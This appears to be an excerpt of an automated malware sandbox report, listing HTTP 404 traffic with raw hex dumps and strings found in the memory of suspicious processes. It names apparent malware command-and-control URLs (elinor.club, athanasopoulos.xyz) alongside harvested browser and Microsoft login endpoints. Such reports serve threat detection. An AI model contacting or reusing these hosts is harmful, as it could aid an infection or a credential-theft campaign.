                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:54:13 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:54:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 01:54:18 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 01:54:24 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e 30 0e 53 f7 3e 70 43 3f a8 c0 f0 57 02 a3 c8 11 4a 60 e3 f7 b3 f6 96 1d f9 45 7f 06 a0 a2 38 2b 1e 06 ff ec 5d da fb 69 af 63 d8 04 c7 70 e4 fd 58 6e 39 4e 98 fa 0f 83 9b fe c4 2a fc 30 7d d7 fd 9f df d9 2f 5d bb 0a b3 f4 0b 38 7a 56 b9 c5 8d 3c 9c b0 cc 63 0b c8 62 1f 67 76 f4 7f b0 dd d7 1e 7f 16 90 c8 ed 4e cf 4c de c7 ae 07 a4 64 d5 55 f6 7e b3 97 e1 e2 59 8a 3f 8e bf 9d 7d 80 22 d7 1a 78 3b e9 57 80 c8 3c 4b 4b f7 3e 4c bd ec e6 a0 af 72 65 2f ed 6d ef ab e5 65 65 55 75 09 b4 e3 b8 37 8b 2f a8 79 56 3f 89 20 ff f2 47 ab 0b d7 2a b3 f4 f3 f5 18 79 bd be 87 e4 67 2a b8 e2 ec 22 53 bb ba 9c eb cb 77 cd 82 f3 f6 7b dd f7 8e e2 66 c3 d7 d3 22 97 f6 21 bf 3d 96 7a 60 00 c3 fb 40 5c 57 68 2d dc dc b5 80 ce 80 1b 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 18 a7 09 fa fd b4 d7 b1 c9 a5 bd 8d 5d 9d f2 96 23 eb 93 43 fd 3a 89 fb b0 72 93 f2 86 cc 77 24 61 00 47 3f 98 52 98 be 99 f2 18 ff 04 68 d7 fa b8 a1 fe 82 e3 7d 56 55 59 f2 30 e8 f7 78 3b 6c 2f af 2b 2c a1 c3 eb c1 2b 49 bc a3 7f 2b 86 5e dd f7 8e 6b 67 85 d5 eb ef 61 00 5c 8a 5b f4 4e e8 fd 46 af 12 07 fe 88 61 af b4 f1 e9 3e 0f 41 d6 b8 c5 15 be de b3 f1 e0 65 76 5d 7e 3e 6c 01 3f d3 dc 5a ce 2b 13 18 3d 24 c6 c3 37 06 af 98 f8 1c c5 af 7e ed 23 45 fd 82 18 eb f8 46 37 df 2d 2d 4c 2f 3e fb 03 9f 17 87 65 75 7f 09 2b 3d e0 53 77 90 d5 55 19 02 87 d0 7f bc b1 df 2b f2 95 bb 1b 67 fc 1d 5e 57 fd 6f a7 05 3c c5 e1 0d 5b 5e 9c f5 f6 d5 7b c6 f7 3b 5c 34 6d c5 a1 0f 94 6c 83 1b 82 5b bc 8d bf 91 fc 7a 63 37 2f a0 ff 68 a7 4b c0 05 31 ea 33 1f d6 3b 82 fb 30 b1 fc 5b 35 7e 3f d4 a7 be f7 b2 b4 bf e5 80 00 75 7b be 3e e6 b6 2f f1 71 9f c5 ce db 29 7a 39 5e 9f f2 47 19 b4 59 e1 dc ef 01 46 22 10 a3 fa 3f f7 56 1c bf 27 f0 4b a7 02 41 1d 80 7b 00 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 01:54:26 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e 30 0e 53 f7 3e 70 43 3f a8 c0 f0 57 02 a3 c8 11 4a 60 e3 f7 b3 f6 96 1d f9 45 7f 06 a0 a2 38 2b 1e 06 ff ec 5d da fb 69 af 63 d8 04 c7 70 e4 fd 58 6e 39 4e 98 fa 0f 83 9b fe c4 2a fc 30 7d d7 fd 9f df d9 2f 5d bb 0a b3 f4 0b 38 7a 56 b9 c5 8d 3c 9c b0 cc 63 0b c8 62 1f 67 76 f4 7f b0 dd d7 1e 7f 16 90 c8 ed 4e cf 4c de c7 ae 07 a4 64 d5 55 f6 7e b3 97 e1 e2 59 8a 3f 8e bf 9d 7d 80 22 d7 1a 78 3b e9 57 80 c8 3c 4b 4b f7 3e 4c bd ec e6 a0 af 72 65 2f ed 6d ef ab e5 65 65 55 75 09 b4 e3 b8 37 8b 2f a8 79 56 3f 89 20 ff f2 47 ab 0b d7 2a b3 f4 f3 f5 18 79 bd be 87 e4 67 2a b8 e2 ec 22 53 bb ba 9c eb cb 77 cd 82 f3 f6 7b dd f7 8e e2 66 c3 d7 d3 22 97 f6 21 bf 3d 96 7a 60 00 c3 fb 40 5c 57 68 2d dc dc b5 80 ce 80 1b 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 18 a7 09 fa fd b4 d7 b1 c9 a5 bd 8d 5d 9d f2 96 23 eb 93 43 fd 3a 89 fb b0 72 93 f2 86 cc 77 24 61 00 47 3f 98 52 98 be 99 f2 18 ff 04 68 d7 fa b8 a1 fe 82 e3 7d 56 55 59 f2 30 e8 f7 78 3b 6c 2f af 2b 2c a1 c3 eb c1 2b 49 bc a3 7f 2b 86 5e dd f7 8e 6b 67 85 d5 eb ef 61 00 5c 8a 5b f4 4e e8 fd 46 af 12 07 fe 88 61 af b4 f1 e9 3e 0f 41 d6 b8 c5 15 be de b3 f1 e0 65 76 5d 7e 3e 6c 01 3f d3 dc 5a ce 2b 13 18 3d 24 c6 c3 37 06 af 98 f8 1c c5 af 7e ed 23 45 fd 82 18 eb f8 46 37 df 2d 2d 4c 2f 3e fb 03 9f 17 87 65 75 7f 09 2b 3d e0 53 77 90 d5 55 19 02 87 d0 7f bc b1 df 2b f2 95 bb 1b 67 fc 1d 5e 57 fd 6f a7 05 3c c5 e1 0d 5b 5e 9c f5 f6 d5 7b c6 f7 3b 5c 34 6d c5 a1 0f 94 6c 83 1b 82 5b bc 8d bf 91 fc 7a 63 37 2f a0 ff 68 a7 4b c0 05 31 ea 33 1f d6 3b 82 fb 30 b1 fc 5b 35 7e 3f d4 a7 be f7 b2 b4 bf e5 80 00 75 7b be 3e e6 b6 2f f1 71 9f c5 ce db 29 7a 39 5e 9f f2 47 19 b4 59 e1 dc ef 01 46 22 10 a3 fa 3f f7 56 1c bf 27 f0 4b a7 02 41 1d 80 7b 00 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sat, 11 Jan 2025 01:54:29 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a dc 24 a8 95 7a 17 17 01 90 04 08 80 04 49 d0 e1 98 00 71 13 27 71 93 1b 7e 20 bf 86 9f cc 05 4a 6a 51 6c 69 ba d7 e1 1f ae 99 08 11 75 64 65 65 7e 99 59 9d 59 bf fd f6 db e3 3f 71 0b 76 65 aa fc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e5 7c fb ed f2 33 71 2b 0b cc a8 f2 7b f7 58 87 cd d3 1d 9b a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e ac a2 74 ab a7 ba f2 ee a9 bb 4f e9 58 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 b5 b0 fc c4 fa 47 56 f0 5d 1e 16 6e 79 b5 04 79 47 3d b5 12 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8a ef 4b db 8a dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 4a 56 0d 26 59 9d 3a 8f f0 73 e7 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 99 da 7f f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 db 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 5c 56 86 67 f7 61 80 12 79 f7 7e 30 0e 53 f7 3e 70 43 3f a8 c0 f0 57 02 a3 c8 11 4a 60 e3 f7 b3 f6 96 1d f9 45 7f 06 a0 a2 38 2b 1e 06 ff ec 5d da fb 69 af 63 d8 04 c7 70 e4 fd 58 6e 39 4e 98 fa 0f 83 9b fe c4 2a fc 30 7d d7 fd 9f df d9 2f 5d bb 0a b3 f4 0b 38 7a 56 b9 c5 8d 3c 9c b0 cc 63 0b c8 62 1f 67 76 f4 7f b0 dd d7 1e 7f 16 90 c8 ed 4e cf 4c de c7 ae 07 a4 64 d5 55 f6 7e b3 97 e1 e2 59 8a 3f 8e bf 9d 7d 80 22 d7 1a 78 3b e9 57 80 c8 3c 4b 4b f7 3e 4c bd ec e6 a0 af 72 65 2f ed 6d ef ab e5 65 65 55 75 09 b4 e3 b8 37 8b 2f a8 79 56 3f 89 20 ff f2 47 ab 0b d7 2a b3 f4 f3 f5 18 79 bd be 87 e4 67 2a b8 e2 ec 22 53 bb ba 9c eb cb 77 cd 82 f3 f6 7b dd f7 8e e2 66 c3 d7 d3 22 97 f6 21 bf 3d 96 7a 60 00 c3 fb 40 5c 57 68 2d dc dc b5 80 ce 80 1b 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 18 a7 09 fa fd b4 d7 b1 c9 a5 bd 8d 5d 9d f2 96 23 eb 93 43 fd 3a 89 fb b0 72 93 f2 86 cc 77 24 61 00 47 3f 98 52 98 be 99 f2 18 ff 04 68 d7 fa b8 a1 fe 82 e3 7d 56 55 59 f2 30 e8 f7 78 3b 6c 2f af 2b 2c a1 c3 eb c1 2b 49 bc a3 7f 2b 86 5e dd f7 8e 6b 67 85 d5 eb ef 61 00 5c 8a 5b f4 4e e8 fd 46 af 12 07 fe 88 61 af b4 f1 e9 3e 0f 41 d6 b8 c5 15 be de b3 f1 e0 65 76 5d 7e 3e 6c 01 3f d3 dc 5a ce 2b 13 18 3d 24 c6 c3 37 06 af 98 f8 1c c5 af 7e ed 23 45 fd 82 18 eb f8 46 37 df 2d 2d 4c 2f 3e fb 03 9f 17 87 65 75 7f 09 2b 3d e0 53 77 90 d5 55 19 02 87 d0 7f bc b1 df 2b f2 95 bb 1b 67 fc 1d 5e 57 fd 6f a7 05 3c c5 e1 0d 5b 5e 9c f5 f6 d5 7b c6 f7 3b 5c 34 6d c5 a1 0f 94 6c 83 1b 82 5b bc 8d bf 91 fc 7a 63 37 2f a0 ff 68 a7 4b c0 05 31 ea 33 1f d6 3b 82 fb 30 b1 fc 5b 35 7e 3f d4 a7 be f7 b2 b4 bf e5 80 00 75 7b be 3e e6 b6 2f f1 71 9f c5 ce db 29 7a 39 5e 9f f2 47 19 b4 59 e1 dc ef 01 46 22 10 a3 fa 3f f7 56 1c bf 27 f0 4b a7 02 41 1d 80 7b 00 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Sat, 11 Jan 2025 01:54:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: control.exe, 00000005.00000002.2628309209.00000000053E4000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000005.00000002.2628309209.000000000589A000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002F9A000.00000004.00000001.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002AE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2136446818.00000000399E4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: control.exe, 00000005.00000002.2628309209.0000000005576000.00000004.10000000.00040000.00000000.sdmp, rVnDkmUdXXPrwb.exe, 00000008.00000002.2627397785.0000000002C76000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://elinor.club/izuw/?0lTTc=ruxYo8C32atpYpzQJOvfIcCXiNL6eNxgwckfL1b1c00g4qOjwbRrLMaH3ssm
                Source: rVnDkmUdXXPrwb.exe, 00000008.00000002.2623602119.00000000008AF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.athanasopoulos.xyz
                Source: rVnDkmUdXXPrwb.exe, 00000008.00000002.2623602119.00000000008AF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.athanasopoulos.xyz/c3ib/
                Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: control.exe, 00000005.00000003.2031769309.0000000007CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: control.exe, 00000005.00000002.2620545178.0000000002CA6000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.2620545178.0000000002C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: control.exe, 00000005.00000002.2620545178.0000000002CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: control.exe, 00000005.00000002.2620545178.0000000002C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: control.exe, 00000005.00000002.2620545178.0000000002C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033A
                Source: control.exe, 00000005.00000002.2620545178.0000000002C84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033V
                Source: control.exe, 00000005.00000002.2620545178.0000000002CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=http
